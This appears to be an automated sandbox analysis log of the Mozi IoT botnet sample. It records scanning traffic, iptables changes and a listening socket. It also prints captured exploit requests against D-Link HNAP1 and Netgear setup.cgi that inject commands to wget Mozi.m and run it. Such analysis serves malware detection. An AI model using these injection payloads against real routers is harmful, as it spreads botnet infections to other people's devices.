Source: global traffic TCP traffic: 192.168.2.20:40736 -> 175.10.248.75:8080
Source: global traffic TCP traffic: 192.168.2.20:37594 -> 124.244.15.23:8080
Source: global traffic TCP traffic: 192.168.2.20:55900 -> 219.224.59.244:52869
Source: global traffic TCP traffic: 192.168.2.20:37038 -> 132.70.142.5:81
Source: global traffic TCP traffic: 192.168.2.20:56930 -> 34.188.48.201:8080
Source: global traffic TCP traffic: 192.168.2.20:46906 -> 115.16.10.21:49152
Source: global traffic TCP traffic: 192.168.2.20:50726 -> 58.177.55.29:8080
Source: global traffic TCP traffic: 192.168.2.20:49846 -> 63.153.103.58:8080
Source: global traffic TCP traffic: 192.168.2.20:12122 -> 220.81.142.179:1023
Source: global traffic TCP traffic: 192.168.2.20:12122 -> 218.237.227.44:2323
Source: global traffic TCP traffic: 192.168.2.20:12122 -> 221.197.159.218:2323
Source: global traffic TCP traffic: 192.168.2.20:12122 -> 99.70.134.35:2323
Source: global traffic TCP traffic: 192.168.2.20:12122 -> 204.122.188.208:2323
Source: global traffic TCP traffic: 192.168.2.20:12122 -> 212.226.50.190:2323
Source: global traffic TCP traffic: 192.168.2.20:12122 -> 90.192.99.77:2323
Source: global traffic TCP traffic: 192.168.2.20:12122 -> 92.82.131.177:2323
Source: global traffic TCP traffic: 192.168.2.20:12122 -> 184.104.186.255:2323
Source: global traffic TCP traffic: 192.168.2.20:12122 -> 80.254.91.193:2323
Source: global traffic TCP traffic: 192.168.2.20:12122 -> 83.101.129.190:2323
Source: global traffic TCP traffic: 192.168.2.20:12122 -> 150.65.96.123:2323
Source: global traffic TCP traffic: 192.168.2.20:12122 -> 13.28.70.135:2323
Source: global traffic TCP traffic: 192.168.2.20:12122 -> 98.124.110.124:1023
Source: global traffic TCP traffic: 192.168.2.20:12122 -> 180.54.149.225:2323
Source: global traffic TCP traffic: 192.168.2.20:12122 -> 71.97.182.98:2323
Source: global traffic TCP traffic: 192.168.2.20:12122 -> 103.221.97.223:2323
Source: global traffic TCP traffic: 192.168.2.20:52662 -> 19.234.87.63:8080
Source: global traffic TCP traffic: 192.168.2.20:12122 -> 145.239.19.214:1023
Source: global traffic TCP traffic: 192.168.2.20:12122 -> 114.2.64.142:2323
Source: global traffic TCP traffic: 192.168.2.20:12122 -> 130.221.2.128:2323
Source: global traffic TCP traffic: 192.168.2.20:12122 -> 169.240.120.21:2323
Source: global traffic TCP traffic: 192.168.2.20:12122 -> 4.225.63.171:2323
Source: global traffic TCP traffic: 192.168.2.20:12122 -> 171.88.94.59:2323
Source: global traffic TCP traffic: 192.168.2.20:12122 -> 12.149.196.84:2323
Source: global traffic TCP traffic: 192.168.2.20:12122 -> 110.105.251.231:2323
Source: global traffic TCP traffic: 192.168.2.20:12122 -> 36.251.209.137:2323
Source: global traffic TCP traffic: 192.168.2.20:12122 -> 136.242.26.58:2323
Source: global traffic TCP traffic: 192.168.2.20:12122 -> 80.170.60.151:2323
Source: global traffic TCP traffic: 192.168.2.20:12122 -> 110.76.95.204:2323
Source: global traffic TCP traffic: 192.168.2.20:12122 -> 67.181.53.78:2323
Source: global traffic TCP traffic: 192.168.2.20:12122 -> 169.238.12.52:1023
Source: global traffic TCP traffic: 192.168.2.20:12122 -> 163.191.185.236:2323
Source: global traffic TCP traffic: 192.168.2.20:12122 -> 118.202.243.49:2323
Source: global traffic TCP traffic: 192.168.2.20:12122 -> 94.171.188.7:2323
Source: global traffic TCP traffic: 192.168.2.20:53980 -> 208.121.15.128:5555
Source: global traffic TCP traffic: 192.168.2.20:50642 -> 122.143.33.15:37215
Source: global traffic TCP traffic: 192.168.2.20:36584 -> 44.186.214.45:8080
Source: global traffic TCP traffic: 192.168.2.20:38480 -> 31.94.18.17:8080
Source: global traffic TCP traffic: 192.168.2.20:41372 -> 149.223.98.215:8443
Source: global traffic TCP traffic: 192.168.2.20:34480 -> 173.136.33.68:8443
Source: global traffic TCP traffic: 192.168.2.20:58924 -> 96.60.228.58:5555
Source: global traffic TCP traffic: 192.168.2.20:59914 -> 101.103.73.125:5555
Source: global traffic TCP traffic: 192.168.2.20:32820 -> 58.160.77.79:5555
Source: global traffic TCP traffic: 192.168.2.20:35174 -> 55.187.169.167:5555
Source: global traffic TCP traffic: 192.168.2.20:42894 -> 169.8.56.140:5555
Source: global traffic TCP traffic: 192.168.2.20:59034 -> 95.195.140.113:8443
Source: global traffic TCP traffic: 192.168.2.20:47696 -> 204.31.115.147:8080
Source: global traffic TCP traffic: 192.168.2.20:59066 -> 40.138.183.204:8080
Source: global traffic TCP traffic: 192.168.2.20:51500 -> 154.57.107.198:49152
Source: global traffic TCP traffic: 192.168.2.20:55828 -> 19.76.200.46:49152
Source: global traffic TCP traffic: 192.168.2.20:49682 -> 122.101.90.140:81
Source: global traffic TCP traffic: 192.168.2.20:51458 -> 87.162.119.140:37215
Source: global traffic TCP traffic: 192.168.2.20:33784 -> 176.181.32.218:8080
Source: global traffic TCP traffic: 192.168.2.20:36488 -> 194.160.179.117:37215
Source: global traffic TCP traffic: 192.168.2.20:35776 -> 168.222.225.0:49152
Source: global traffic TCP traffic: 192.168.2.20:41830 -> 55.141.32.238:8080
Source: global traffic TCP traffic: 192.168.2.20:48042 -> 153.116.121.166:81
Source: global traffic TCP traffic: 192.168.2.20:38162 -> 122.134.129.152:8443
Source: global traffic TCP traffic: 192.168.2.20:52448 -> 186.91.75.186:7574
Source: global traffic TCP traffic: 192.168.2.20:37012 -> 49.143.93.65:52869
Source: global traffic TCP traffic: 192.168.2.20:56254 -> 50.31.248.176:5555
Source: global traffic TCP traffic: 192.168.2.20:46686 -> 22.31.234.115:8080
Source: global traffic TCP traffic: 192.168.2.20:45678 -> 39.179.29.20:37215
Source: global traffic TCP traffic: 192.168.2.20:34350 -> 177.203.121.240:8080
Source: global traffic TCP traffic: 192.168.2.20:48980 -> 53.110.221.193:49152
Source: global traffic TCP traffic: 192.168.2.20:49152 -> 143.43.201.31:7574
Source: global traffic TCP traffic: 192.168.2.20:46992 -> 42.124.198.47:52869
Source: global traffic TCP traffic: 192.168.2.20:51302 -> 68.103.167.2:49152
Source: global traffic TCP traffic: 192.168.2.20:58110 -> 45.46.146.31:8080
Source: global traffic TCP traffic: 192.168.2.20:40950 -> 44.114.159.0:8080
Source: global traffic TCP traffic: 192.168.2.20:42496 -> 6.179.235.226:8080
Source: global traffic TCP traffic: 192.168.2.20:44480 -> 203.133.121.10:37215
Source: global traffic TCP traffic: 192.168.2.20:51428 -> 157.201.127.64:8443
Source: global traffic TCP traffic: 192.168.2.20:38854 -> 74.86.38.158:49152
Source: global traffic TCP traffic: 192.168.2.20:60592 -> 14.247.219.102:37215
Source: global traffic TCP traffic: 192.168.2.20:46030 -> 70.95.221.241:8080
Source: global traffic TCP traffic: 192.168.2.20:59406 -> 208.150.175.68:49152
Source: global traffic TCP traffic: 192.168.2.20:55114 -> 160.12.55.21:8080
Source: global traffic TCP traffic: 192.168.2.20:42936 -> 134.147.43.174:8443
Source: global traffic TCP traffic: 192.168.2.20:52754 -> 40.118.219.24:8080
Source: global traffic TCP traffic: 192.168.2.20:41908 -> 63.12.57.100:8080
Source: global traffic TCP traffic: 192.168.2.20:56264 -> 74.98.122.143:8080
Source: global traffic TCP traffic: 192.168.2.20:39558 -> 202.157.106.25:8080
Source: global traffic TCP traffic: 192.168.2.20:56204 -> 159.153.119.69:8080
Source: global traffic TCP traffic: 192.168.2.20:51496 -> 84.27.204.184:8080
Source: global traffic TCP traffic: 192.168.2.20:50812 -> 152.15.88.72:8443
Source: global traffic TCP traffic: 192.168.2.20:60200 -> 33.177.217.109:8080
Source: global traffic TCP traffic: 192.168.2.20:51190 -> 11.100.127.8:5555
Source: global traffic TCP traffic: 192.168.2.20:52832 -> 126.130.202.154:8080
Source: global traffic TCP traffic: 192.168.2.20:35870 -> 2.9.169.104:8443
Source: global traffic TCP traffic: 192.168.2.20:59600 -> 171.146.122.140:8443
Source: global traffic TCP traffic: 192.168.2.20:35460 -> 98.66.36.94:8080
Source: global traffic TCP traffic: 192.168.2.20:43902 -> 12.24.80.216:7574
Source: global traffic TCP traffic: 192.168.2.20:34406 -> 16.194.20.156:8080
Source: global traffic TCP traffic: 192.168.2.20:36742 -> 109.93.120.96:8080
Source: global traffic TCP traffic: 192.168.2.20:59882 -> 219.181.14.154:81
Executes the "iptables" command used for managing IP filtering and manipulation
Source: /bin/sh (PID: 4638) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 60120 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 4670) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 60120 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 4674) Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --destination-port 60120 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 4718) Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --source-port 60120 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 4737) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 60120 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 4747) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 60120 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 4772) Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --dport 60120 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 4793) Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --sport 60120 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 4813) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 58000 -j DROP Jump to behavior
Source: /bin/sh (PID: 4816) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 58000 -j DROP Jump to behavior
Source: /bin/sh (PID: 4825) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 58000 -j DROP Jump to behavior
Source: /bin/sh (PID: 4847) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 58000 -j DROP Jump to behavior
Source: /bin/sh (PID: 4895) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 35000 -j DROP Jump to behavior
Source: /bin/sh (PID: 4918) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 50023 -j DROP Jump to behavior
Source: /bin/sh (PID: 4945) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 50023 -j DROP Jump to behavior
Source: /bin/sh (PID: 4966) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 35000 -j DROP Jump to behavior
Source: /bin/sh (PID: 4985) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 7547 -j DROP Jump to behavior
Source: /bin/sh (PID: 5004) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 7547 -j DROP Jump to behavior
Source: /bin/sh (PID: 5022) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 35000 -j DROP Jump to behavior
Source: /bin/sh (PID: 5042) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 50023 -j DROP Jump to behavior
Source: /bin/sh (PID: 5060) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 50023 -j DROP Jump to behavior
Source: /bin/sh (PID: 5079) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 35000 -j DROP Jump to behavior
Source: /bin/sh (PID: 5097) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 7547 -j DROP Jump to behavior
Source: /bin/sh (PID: 5118) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 7547 -j DROP Jump to behavior
Source: /bin/sh (PID: 5219) Iptables executable: /sbin/iptables -> iptables -I INPUT -p udp --destination-port 8987 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 5222) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p udp --source-port 8987 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 5226) Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --destination-port 8987 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 5242) Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --source-port 8987 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 5265) Iptables executable: /sbin/iptables -> iptables -I INPUT -p udp --dport 8987 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 5288) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p udp --sport 8987 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 5314) Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --dport 8987 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 5338) Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --sport 8987 -j ACCEPT Jump to behavior
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 144.76.43.37:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 23.254.64.88:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 113.161.185.44:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 34.66.226.190:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Sample listens on a socket
Source: /tmp/mozi.a.zip (PID: 4621) Socket: 0.0.0.0::60120 Jump to behavior
Source: unknown TCP traffic detected without corresponding DNS query: 45.109.162.162
Source: unknown TCP traffic detected without corresponding DNS query: 69.11.36.124
Source: unknown TCP traffic detected without corresponding DNS query: 75.91.130.63
Source: unknown TCP traffic detected without corresponding DNS query: 95.20.167.162
Source: unknown TCP traffic detected without corresponding DNS query: 195.153.28.200
Source: unknown TCP traffic detected without corresponding DNS query: 23.5.140.124
Source: unknown TCP traffic detected without corresponding DNS query: 156.72.38.195
Source: unknown TCP traffic detected without corresponding DNS query: 195.115.84.245
Source: unknown TCP traffic detected without corresponding DNS query: 144.165.39.167
Source: unknown TCP traffic detected without corresponding DNS query: 209.72.224.1
Source: unknown TCP traffic detected without corresponding DNS query: 215.164.157.85
Source: unknown TCP traffic detected without corresponding DNS query: 148.150.251.31
Source: unknown TCP traffic detected without corresponding DNS query: 153.78.52.143
Source: unknown TCP traffic detected without corresponding DNS query: 201.146.224.72
Source: unknown TCP traffic detected without corresponding DNS query: 84.116.205.234
Source: unknown TCP traffic detected without corresponding DNS query: 47.62.131.40
Source: unknown TCP traffic detected without corresponding DNS query: 35.9.95.44
Source: unknown TCP traffic detected without corresponding DNS query: 65.17.184.203
Source: unknown TCP traffic detected without corresponding DNS query: 174.66.221.232
Source: unknown TCP traffic detected without corresponding DNS query: 26.215.139.222
